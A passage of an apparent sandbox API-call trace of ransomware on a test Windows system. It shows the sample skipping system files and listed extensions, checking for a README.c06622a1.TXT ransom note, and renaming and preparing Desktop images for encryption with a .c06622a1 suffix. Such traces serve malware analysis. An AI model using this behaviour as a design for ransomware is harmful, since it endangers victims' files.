[0156.239] wcslen (_String="ntuser.dat.log") returned 0xe [0156.240] _wcsicmp (_Str1="ntuser.ini", _Str2="SYZKIrJgdWjoZp9.gif") returned -5 [0156.240] wcslen (_String="ntuser.ini") returned 0xa [0156.240] _wcsicmp (_Str1="thumbs.db", _Str2="SYZKIrJgdWjoZp9.gif") returned 1 [0156.240] wcslen (_String="thumbs.db") returned 0x9 [0156.240] _wcsicmp (_Str1="386", _Str2="gif") returned -52 [0156.240] wcslen (_String="386") returned 0x3 [0156.240] _wcsicmp (_Str1="adv", _Str2="gif") returned -6 [0156.240] wcslen (_String="adv") returned 0x3 [0156.240] _wcsicmp (_Str1="ani", _Str2="gif") returned -6 [0156.240] wcslen (_String="ani") returned 0x3 [0156.240] _wcsicmp (_Str1="bat", _Str2="gif") returned -5 [0156.240] wcslen (_String="bat") returned 0x3 [0156.240] _wcsicmp (_Str1="bin", _Str2="gif") returned -5 [0156.240] wcslen (_String="bin") returned 0x3 [0156.240] _wcsicmp (_Str1="cab", _Str2="gif") returned -4 [0156.240] wcslen (_String="cab") returned 0x3 [0156.240] _wcsicmp (_Str1="cmd", _Str2="gif") returned -4 [0156.240] wcslen (_String="cmd") returned 0x3 [0156.240] _wcsicmp (_Str1="com", _Str2="gif") returned -4 [0156.240] wcslen (_String="com") returned 0x3 [0156.240] _wcsicmp (_Str1="cpl", _Str2="gif") returned -4 [0156.240] wcslen (_String="cpl") returned 0x3 [0156.240] _wcsicmp (_Str1="cur", _Str2="gif") returned -4 [0156.240] wcslen (_String="cur") returned 0x3 [0156.240] _wcsicmp (_Str1="deskthemepack", _Str2="gif") returned -3 [0156.240] wcslen (_String="deskthemepack") returned 0xd [0156.240] _wcsicmp (_Str1="diagcab", _Str2="gif") returned -3 [0156.240] wcslen (_String="diagcab") returned 0x7 [0156.240] _wcsicmp (_Str1="diagcfg", _Str2="gif") returned -3 [0156.240] wcslen (_String="diagcfg") returned 0x7 [0156.240] _wcsicmp (_Str1="diagpkg", _Str2="gif") returned -3 [0156.241] wcslen (_String="diagpkg") returned 0x7 [0156.241] _wcsicmp (_Str1="dll", _Str2="gif") returned -3 [0156.241] wcslen (_String="dll") returned 0x3 [0156.241] _wcsicmp (_Str1="drv", _Str2="gif") returned -3 [0156.241] wcslen (_String="drv") returned 0x3 [0156.241] _wcsicmp (_Str1="exe", _Str2="gif") returned -2 [0156.241] wcslen (_String="exe") returned 0x3 [0156.241] _wcsicmp (_Str1="hlp", _Str2="gif") returned 1 [0156.241] wcslen (_String="hlp") returned 0x3 [0156.241] _wcsicmp (_Str1="icl", _Str2="gif") returned 2 [0156.241] wcslen (_String="icl") returned 0x3 [0156.241] _wcsicmp (_Str1="icns", _Str2="gif") returned 2 [0156.241] wcslen (_String="icns") returned 0x4 [0156.241] _wcsicmp (_Str1="ico", _Str2="gif") returned 2 [0156.241] wcslen (_String="ico") returned 0x3 [0156.241] _wcsicmp (_Str1="ics", _Str2="gif") returned 2 [0156.241] wcslen (_String="ics") returned 0x3 [0156.241] _wcsicmp (_Str1="idx", _Str2="gif") returned 2 [0156.241] wcslen (_String="idx") returned 0x3 [0156.241] _wcsicmp (_Str1="ldf", _Str2="gif") returned 5 [0156.241] wcslen (_String="ldf") returned 0x3 [0156.241] _wcsicmp (_Str1="lnk", _Str2="gif") returned 5 [0156.241] wcslen (_String="lnk") returned 0x3 [0156.241] _wcsicmp (_Str1="mod", _Str2="gif") returned 6 [0156.241] wcslen (_String="mod") returned 0x3 [0156.241] _wcsicmp (_Str1="mpa", _Str2="gif") returned 6 [0156.241] wcslen (_String="mpa") returned 0x3 [0156.241] _wcsicmp (_Str1="msc", _Str2="gif") returned 6 [0156.241] wcslen (_String="msc") returned 0x3 [0156.241] _wcsicmp (_Str1="msp", _Str2="gif") returned 6 [0156.241] wcslen (_String="msp") returned 0x3 [0156.241] _wcsicmp (_Str1="msstyles", _Str2="gif") returned 6 [0156.242] wcslen (_String="msstyles") returned 0x8 [0156.242] _wcsicmp (_Str1="msu", _Str2="gif") returned 6 [0156.242] wcslen (_String="msu") returned 0x3 [0156.242] _wcsicmp (_Str1="nls", _Str2="gif") returned 7 [0156.242] wcslen (_String="nls") returned 0x3 [0156.242] _wcsicmp (_Str1="nomedia", _Str2="gif") returned 7 [0156.242] wcslen (_String="nomedia") returned 0x7 [0156.242] _wcsicmp (_Str1="ocx", _Str2="gif") returned 8 [0156.242] wcslen (_String="ocx") returned 0x3 [0156.242] _wcsicmp (_Str1="prf", _Str2="gif") returned 9 [0156.242] wcslen (_String="prf") returned 0x3 [0156.242] _wcsicmp (_Str1="ps1", _Str2="gif") returned 9 [0156.242] wcslen (_String="ps1") returned 0x3 [0156.242] _wcsicmp (_Str1="rom", _Str2="gif") returned 11 [0156.242] wcslen (_String="rom") returned 0x3 [0156.242] _wcsicmp (_Str1="rtp", _Str2="gif") returned 11 [0156.242] wcslen (_String="rtp") returned 0x3 [0156.242] _wcsicmp (_Str1="scr", _Str2="gif") returned 12 [0156.242] wcslen (_String="scr") returned 0x3 [0156.242] _wcsicmp (_Str1="shs", _Str2="gif") returned 12 [0156.242] wcslen (_String="shs") returned 0x3 [0156.242] _wcsicmp (_Str1="spl", _Str2="gif") returned 12 [0156.242] wcslen (_String="spl") returned 0x3 [0156.242] _wcsicmp (_Str1="sys", _Str2="gif") returned 12 [0156.242] wcslen (_String="sys") returned 0x3 [0156.242] _wcsicmp (_Str1="theme", _Str2="gif") returned 13 [0156.242] wcslen (_String="theme") returned 0x5 [0156.242] _wcsicmp (_Str1="themepack", _Str2="gif") returned 13 [0156.242] wcslen (_String="themepack") returned 0x9 [0156.243] _wcsicmp (_Str1="wpx", _Str2="gif") returned 16 [0156.243] wcslen (_String="wpx") returned 0x3 [0156.243] _wcsicmp (_Str1="lock", _Str2="gif") returned 5 [0156.243] wcslen (_String="lock") returned 0x4 [0156.243] _wcsicmp (_Str1="key", _Str2="gif") returned 4 [0156.243] wcslen (_String="key") returned 0x3 [0156.243] _wcsicmp (_Str1="hta", _Str2="gif") returned 1 [0156.243] wcslen (_String="hta") returned 0x3 [0156.243] _wcsicmp (_Str1="msi", _Str2="gif") returned 6 [0156.243] wcslen (_String="msi") returned 0x3 [0156.243] _wcsicmp (_Str1="pdb", _Str2="gif") returned 9 [0156.243] wcslen (_String="pdb") returned 0x3 [0156.243] _wcsicmp (_Str1="sqlite", _Str2="gif") returned 12 [0156.243] wcslen (_String="sqlite") returned 0x6 [0156.243] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0156.243] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x208e20 [0156.243] wcscpy (in: _Dest=0x208e20, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0156.243] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0156.243] wcscpy (in: _Dest=0x208e74, _Source="SYZKIrJgdWjoZp9.gif" | out: _Dest="SYZKIrJgdWjoZp9.gif") returned="SYZKIrJgdWjoZp9.gif" [0156.243] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SYZKIrJgdWjoZp9.gif", dwFileAttributes=0x80) returned 1 [0156.244] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SYZKIrJgdWjoZp9.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\syzkirjgdwjozp9.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0156.244] SetFilePointerEx (in: hFile=0x1a8, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.244] ReadFile (in: hFile=0x1a8, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0156.245] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0xe1b426f7 [0156.245] RtlComputeCrc32 (PartialCrc=0x26f7, Buffer=0x32ec24, Length=0x80) returned 0x5709472f [0156.245] RtlComputeCrc32 (PartialCrc=0x472f, Buffer=0x32ec24, Length=0x80) returned 0x1aef0544 [0156.245] RtlComputeCrc32 (PartialCrc=0x544, Buffer=0x32ec24, Length=0x80) returned 0x9659df87 [0156.245] RtlComputeCrc32 (PartialCrc=0xdf87, Buffer=0x32ec24, Length=0x80) returned 0xfa1ef713 [0156.245] CloseHandle (hObject=0x1a8) returned 1 [0156.245] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x218e28 [0156.245] wcscpy (in: _Dest=0x218e28, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SYZKIrJgdWjoZp9.gif" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SYZKIrJgdWjoZp9.gif") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SYZKIrJgdWjoZp9.gif" [0156.245] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SYZKIrJgdWjoZp9.gif") returned 0x3d [0156.245] wcscpy (in: _Dest=0x218ea2, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.245] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SYZKIrJgdWjoZp9.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\syzkirjgdwjozp9.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SYZKIrJgdWjoZp9.gif.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\syzkirjgdwjozp9.gif.c06622a1"), dwFlags=0x8) returned 1 [0156.247] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\SYZKIrJgdWjoZp9.gif.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\syzkirjgdwjozp9.gif.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1a8 [0156.247] CreateIoCompletionPort (FileHandle=0x1a8, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0156.247] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3900020 [0156.256] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7c2e6378 [0156.256] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1f42e177 [0156.256] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x36c1db41 [0156.256] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4b9babd5 [0156.256] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x35c9da8a [0156.256] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x3db6c1b1 [0156.256] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0xa3a9150 [0156.256] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x711699df [0156.259] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3900094, Length=0x80) returned 0x5b757890 [0156.259] RtlComputeCrc32 (PartialCrc=0x7890, Buffer=0x3900094, Length=0x80) returned 0x93b001de [0156.259] RtlComputeCrc32 (PartialCrc=0x1de, Buffer=0x3900094, Length=0x80) returned 0x15984ae8 [0156.259] RtlComputeCrc32 (PartialCrc=0x4ae8, Buffer=0x3900094, Length=0x80) returned 0x8b063a12 [0156.259] RtlComputeCrc32 (PartialCrc=0x3a12, Buffer=0x3900094, Length=0x80) returned 0x81bdf079 [0156.259] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3900020) returned 1 [0156.259] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x208e20) returned 1 [0156.259] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x218e28) returned 1 [0156.259] FindNextFileW (in: hFindFile=0x1327c8, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4912cbc0, ftCreationTime.dwHighDateTime=0x1d5d88b, ftLastAccessTime.dwLowDateTime=0x2663fd30, ftLastAccessTime.dwHighDateTime=0x1d5e798, ftLastWriteTime.dwLowDateTime=0x2663fd30, ftLastWriteTime.dwHighDateTime=0x1d5e798, nFileSizeHigh=0x0, nFileSizeLow=0xff9f, dwReserved0=0x0, dwReserved1=0x0, cFileName="VVx2M0wK.jpg", cAlternateFileName="")) returned 1 [0156.259] _wcsicmp (_Str1="VVx2M0wK.jpg", _Str2="README.c06622a1.TXT") returned 4 [0156.259] wcsstr (_Str="VVx2M0wK.jpg", _SubStr="README") returned 0x0 [0156.260] _wcsicmp (_Str1="autorun.inf", _Str2="VVx2M0wK.jpg") returned -21 [0156.260] wcslen (_String="autorun.inf") returned 0xb [0156.260] _wcsicmp (_Str1="boot.ini", _Str2="VVx2M0wK.jpg") returned -20 [0156.260] wcslen (_String="boot.ini") returned 0x8 [0156.260] _wcsicmp (_Str1="bootfont.bin", _Str2="VVx2M0wK.jpg") returned -20 [0156.260] wcslen (_String="bootfont.bin") returned 0xc [0156.260] _wcsicmp (_Str1="bootsect.bak", _Str2="VVx2M0wK.jpg") returned -20 [0156.260] wcslen (_String="bootsect.bak") returned 0xc [0156.260] _wcsicmp (_Str1="desktop.ini", _Str2="VVx2M0wK.jpg") returned -18 [0156.260] wcslen (_String="desktop.ini") returned 0xb [0156.260] _wcsicmp (_Str1="iconcache.db", _Str2="VVx2M0wK.jpg") returned -13 [0156.260] wcslen (_String="iconcache.db") returned 0xc [0156.260] _wcsicmp (_Str1="ntldr", _Str2="VVx2M0wK.jpg") returned -8 [0156.260] wcslen (_String="ntldr") returned 0x5 [0156.260] _wcsicmp (_Str1="ntuser.dat", _Str2="VVx2M0wK.jpg") returned -8 [0156.260] wcslen (_String="ntuser.dat") returned 0xa [0156.260] _wcsicmp (_Str1="ntuser.dat.log", _Str2="VVx2M0wK.jpg") returned -8 [0156.260] wcslen (_String="ntuser.dat.log") returned 0xe [0156.260] _wcsicmp (_Str1="ntuser.ini", _Str2="VVx2M0wK.jpg") returned -8 [0156.260] wcslen (_String="ntuser.ini") returned 0xa [0156.260] _wcsicmp (_Str1="thumbs.db", _Str2="VVx2M0wK.jpg") returned -2 [0156.260] wcslen (_String="thumbs.db") returned 0x9 [0156.260] _wcsicmp (_Str1="386", _Str2="jpg") returned -55 [0156.260] wcslen (_String="386") returned 0x3 [0156.260] _wcsicmp (_Str1="adv", _Str2="jpg") returned -9 [0156.260] wcslen (_String="adv") returned 0x3 [0156.260] _wcsicmp (_Str1="ani", _Str2="jpg") returned -9 [0156.260] wcslen (_String="ani") returned 0x3 [0156.261] _wcsicmp (_Str1="bat", _Str2="jpg") returned -8 [0156.261] wcslen (_String="bat") returned 0x3 [0156.261] _wcsicmp (_Str1="bin", _Str2="jpg") returned -8 [0156.261] wcslen (_String="bin") returned 0x3 [0156.261] _wcsicmp (_Str1="cab", _Str2="jpg") returned -7 [0156.261] wcslen (_String="cab") returned 0x3 [0156.261] _wcsicmp (_Str1="cmd", _Str2="jpg") returned -7 [0156.261] wcslen (_String="cmd") returned 0x3 [0156.261] _wcsicmp (_Str1="com", _Str2="jpg") returned -7 [0156.261] wcslen (_String="com") returned 0x3 [0156.261] _wcsicmp (_Str1="cpl", _Str2="jpg") returned -7 [0156.261] wcslen (_String="cpl") returned 0x3 [0156.261] _wcsicmp (_Str1="cur", _Str2="jpg") returned -7 [0156.261] wcslen (_String="cur") returned 0x3 [0156.261] _wcsicmp (_Str1="deskthemepack", _Str2="jpg") returned -6 [0156.261] wcslen (_String="deskthemepack") returned 0xd [0156.261] _wcsicmp (_Str1="diagcab", _Str2="jpg") returned -6 [0156.261] wcslen (_String="diagcab") returned 0x7 [0156.261] _wcsicmp (_Str1="diagcfg", _Str2="jpg") returned -6 [0156.261] wcslen (_String="diagcfg") returned 0x7 [0156.261] _wcsicmp (_Str1="diagpkg", _Str2="jpg") returned -6 [0156.261] wcslen (_String="diagpkg") returned 0x7 [0156.261] _wcsicmp (_Str1="dll", _Str2="jpg") returned -6 [0156.261] wcslen (_String="dll") returned 0x3 [0156.261] _wcsicmp (_Str1="drv", _Str2="jpg") returned -6 [0156.261] wcslen (_String="drv") returned 0x3 [0156.261] _wcsicmp (_Str1="exe", _Str2="jpg") returned -5 [0156.261] wcslen (_String="exe") returned 0x3 [0156.261] _wcsicmp (_Str1="hlp", _Str2="jpg") returned -2 [0156.261] wcslen (_String="hlp") returned 0x3 [0156.262] _wcsicmp (_Str1="icl", _Str2="jpg") returned -1 [0156.262] wcslen (_String="icl") returned 0x3 [0156.262] _wcsicmp (_Str1="icns", _Str2="jpg") returned -1 [0156.262] wcslen (_String="icns") returned 0x4 [0156.262] _wcsicmp (_Str1="ico", _Str2="jpg") returned -1 [0156.262] wcslen (_String="ico") returned 0x3 [0156.262] _wcsicmp (_Str1="ics", _Str2="jpg") returned -1 [0156.262] wcslen (_String="ics") returned 0x3 [0156.262] _wcsicmp (_Str1="idx", _Str2="jpg") returned -1 [0156.262] wcslen (_String="idx") returned 0x3 [0156.262] _wcsicmp (_Str1="ldf", _Str2="jpg") returned 2 [0156.262] wcslen (_String="ldf") returned 0x3 [0156.262] _wcsicmp (_Str1="lnk", _Str2="jpg") returned 2 [0156.262] wcslen (_String="lnk") returned 0x3 [0156.262] _wcsicmp (_Str1="mod", _Str2="jpg") returned 3 [0156.262] wcslen (_String="mod") returned 0x3 [0156.262] _wcsicmp (_Str1="mpa", _Str2="jpg") returned 3 [0156.262] wcslen (_String="mpa") returned 0x3 [0156.262] _wcsicmp (_Str1="msc", _Str2="jpg") returned 3 [0156.262] wcslen (_String="msc") returned 0x3 [0156.262] _wcsicmp (_Str1="msp", _Str2="jpg") returned 3 [0156.262] wcslen (_String="msp") returned 0x3 [0156.262] _wcsicmp (_Str1="msstyles", _Str2="jpg") returned 3 [0156.262] wcslen (_String="msstyles") returned 0x8 [0156.262] _wcsicmp (_Str1="msu", _Str2="jpg") returned 3 [0156.262] wcslen (_String="msu") returned 0x3 [0156.262] _wcsicmp (_Str1="nls", _Str2="jpg") returned 4 [0156.262] wcslen (_String="nls") returned 0x3 [0156.262] _wcsicmp (_Str1="nomedia", _Str2="jpg") returned 4 [0156.262] wcslen (_String="nomedia") returned 0x7 [0156.262] _wcsicmp (_Str1="ocx", _Str2="jpg") returned 5 [0156.262] wcslen (_String="ocx") returned 0x3 [0156.263] _wcsicmp (_Str1="prf", _Str2="jpg") returned 6 [0156.263] wcslen (_String="prf") returned 0x3 [0156.263] _wcsicmp (_Str1="ps1", _Str2="jpg") returned 6 [0156.263] wcslen (_String="ps1") returned 0x3 [0156.263] _wcsicmp (_Str1="rom", _Str2="jpg") returned 8 [0156.263] wcslen (_String="rom") returned 0x3 [0156.263] _wcsicmp (_Str1="rtp", _Str2="jpg") returned 8 [0156.263] wcslen (_String="rtp") returned 0x3 [0156.263] _wcsicmp (_Str1="scr", _Str2="jpg") returned 9 [0156.263] wcslen (_String="scr") returned 0x3 [0156.263] _wcsicmp (_Str1="shs", _Str2="jpg") returned 9 [0156.263] wcslen (_String="shs") returned 0x3 [0156.263] _wcsicmp (_Str1="spl", _Str2="jpg") returned 9 [0156.263] wcslen (_String="spl") returned 0x3 [0156.263] _wcsicmp (_Str1="sys", _Str2="jpg") returned 9 [0156.263] wcslen (_String="sys") returned 0x3 [0156.263] _wcsicmp (_Str1="theme", _Str2="jpg") returned 10 [0156.263] wcslen (_String="theme") returned 0x5 [0156.263] _wcsicmp (_Str1="themepack", _Str2="jpg") returned 10 [0156.263] wcslen (_String="themepack") returned 0x9 [0156.263] _wcsicmp (_Str1="wpx", _Str2="jpg") returned 13 [0156.263] wcslen (_String="wpx") returned 0x3 [0156.263] _wcsicmp (_Str1="lock", _Str2="jpg") returned 2 [0156.263] wcslen (_String="lock") returned 0x4 [0156.263] _wcsicmp (_Str1="key", _Str2="jpg") returned 1 [0156.263] wcslen (_String="key") returned 0x3 [0156.263] _wcsicmp (_Str1="hta", _Str2="jpg") returned -2 [0156.263] wcslen (_String="hta") returned 0x3 [0156.263] _wcsicmp (_Str1="msi", _Str2="jpg") returned 3 [0156.263] wcslen (_String="msi") returned 0x3 [0156.263] _wcsicmp (_Str1="pdb", _Str2="jpg") returned 6 [0156.263] wcslen (_String="pdb") returned 0x3 [0156.264] _wcsicmp (_Str1="sqlite", _Str2="jpg") returned 9 [0156.264] wcslen (_String="sqlite") returned 0x6 [0156.264] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0156.264] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x208e20 [0156.264] wcscpy (in: _Dest=0x208e20, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0156.264] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x29 [0156.264] wcscpy (in: _Dest=0x208e74, _Source="VVx2M0wK.jpg" | out: _Dest="VVx2M0wK.jpg") returned="VVx2M0wK.jpg" [0156.264] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VVx2M0wK.jpg", dwFileAttributes=0x80) returned 1 [0156.264] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VVx2M0wK.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vvx2m0wk.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0156.264] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.264] ReadFile (in: hFile=0x1cc, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0156.265] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0x9a98288c [0156.265] RtlComputeCrc32 (PartialCrc=0x288c, Buffer=0x32ec24, Length=0x80) returned 0xd531f593 [0156.265] RtlComputeCrc32 (PartialCrc=0xf593, Buffer=0x32ec24, Length=0x80) returned 0x82231e9c [0156.265] RtlComputeCrc32 (PartialCrc=0x1e9c, Buffer=0x32ec24, Length=0x80) returned 0x824d0ce2 [0156.265] RtlComputeCrc32 (PartialCrc=0xce2, Buffer=0x32ec24, Length=0x80) returned 0x2dc503bd [0156.265] CloseHandle (hObject=0x1cc) returned 1 [0156.265] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x218e28 [0156.265] wcscpy (in: _Dest=0x218e28, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VVx2M0wK.jpg" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VVx2M0wK.jpg") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VVx2M0wK.jpg" [0156.265] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VVx2M0wK.jpg") returned 0x36 [0156.266] wcscpy (in: _Dest=0x218e94, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.266] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VVx2M0wK.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vvx2m0wk.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VVx2M0wK.jpg.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vvx2m0wk.jpg.c06622a1"), dwFlags=0x8) returned 1 [0156.268] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\VVx2M0wK.jpg.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\vvx2m0wk.jpg.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1cc [0156.268] CreateIoCompletionPort (FileHandle=0x1cc, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0156.268] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x3990020 [0156.276] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x43df3d26 [0156.276] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1b4d289c [0156.276] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5cdccba3 [0156.276] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x50fcf12f [0156.276] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x689c71e9 [0156.276] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1385a8fb [0156.276] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x693a98fe [0156.276] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7a008e2c [0156.279] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3990094, Length=0x80) returned 0x50017d97 [0156.279] RtlComputeCrc32 (PartialCrc=0x7d97, Buffer=0x3990094, Length=0x80) returned 0xcc76a56f [0156.279] RtlComputeCrc32 (PartialCrc=0xa56f, Buffer=0x3990094, Length=0x80) returned 0x14547419 [0156.279] RtlComputeCrc32 (PartialCrc=0x7419, Buffer=0x3990094, Length=0x80) returned 0x4f6c9ce4 [0156.279] RtlComputeCrc32 (PartialCrc=0x9ce4, Buffer=0x3990094, Length=0x80) returned 0xb4015eca [0156.279] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x3990020) returned 1 [0156.279] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x208e20) returned 1 [0156.280] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x218e28) returned 1 [0156.280] FindNextFileW (in: hFindFile=0x1327c8, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7b580500, ftCreationTime.dwHighDateTime=0x1d5e79f, ftLastAccessTime.dwLowDateTime=0x61139e90, ftLastAccessTime.dwHighDateTime=0x1d5dcfd, ftLastWriteTime.dwLowDateTime=0x61139e90, ftLastWriteTime.dwHighDateTime=0x1d5dcfd, nFileSizeHigh=0x0, nFileSizeLow=0x13f1d, dwReserved0=0x0, dwReserved1=0x0, cFileName="WPXZau7ksZL.jpg", cAlternateFileName="WPXZAU~1.JPG")) returned 1 [0156.280] _wcsicmp (_Str1="WPXZau7ksZL.jpg", _Str2="README.c06622a1.TXT") returned 5 [0156.280] wcsstr (_Str="WPXZau7ksZL.jpg", _SubStr="README") returned 0x0 [0156.280] _wcsicmp (_Str1="autorun.inf", _Str2="WPXZau7ksZL.jpg") returned -22 [0156.280] wcslen (_String="autorun.inf") returned 0xb [0156.280] _wcsicmp (_Str1="boot.ini", _Str2="WPXZau7ksZL.jpg") returned -21 [0156.280] wcslen (_String="boot.ini") returned 0x8 [0156.280] _wcsicmp (_Str1="bootfont.bin", _Str2="WPXZau7ksZL.jpg") returned -21 [0156.280] wcslen (_String="bootfont.bin") returned 0xc [0156.280] _wcsicmp (_Str1="bootsect.bak", 